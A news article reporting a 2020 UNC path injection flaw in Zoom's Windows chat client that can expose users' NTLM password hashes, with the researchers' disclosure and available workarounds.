The Windows client of viral video chat app, Zoom, reportedly has a critical vulnerability that could allow attackers to steal the login credentials of users. According to cybersecurity researchers, Matthew Hickey (@HackerFantastic) and Mitch (@_g0dmode0), the software’s chat feature is vulnerable to UNC path injection, enabling attackers to capture the NTLM password hashes every time someone clicks on a link within messages.
Hi @zoom_us & @NCSC – here is an example of exploiting the Zoom Windows client using UNC path injection to expose credentials for use in SMBRelay attacks. The screen shot below shows an example UNC path link and the credentials being exposed (redacted). pic.twitter.com/gjWXas7TMO
— Hacker Fantastic (@hackerfantastic) March 31, 2020
As reported by Bleeping Computer, the vulnerability stems from the fact that Zoom automatically converts all URLs that are sent via text messages into hyperlinks. However, it currently fails to distinguish between actual URLs and Windows networking UNC paths, converting all of them into hyperlinks en masse. If a user clicks on a UNC path link, Windows will attempt to connect to the remote site, thereby sending the user’s login name and NTLM password hash to the malicious server.
The researchers also released a proof-of-concept demo that not only illustrates how the password hashes can be sent to third-party servers, but how they can be also be cracked using free tools like Hashcat to dehash, potentially jeopardizing millions of users. As if that wasn’t bad enough, Hickey also claims that the vulnerability can be used to launch programs on a local computer by using a similar process.
The problem remained unresolved as of Tuesday, but Hickey says that Zoom can easily mitigate it by no longer converting UNC paths into clickable hyperlinks. “Zoom should not render UNC paths as hyperlinks is the fix, I have notified Zoom as I disclosed it on Twitter”, he told Bleeping Computer. Zoom is yet to release a fix to mitigate the vulnerability, but there are a couple of manual workarounds using the Group Policy Editor and the Windows Registry. You can check them out on Bleeping Computer.
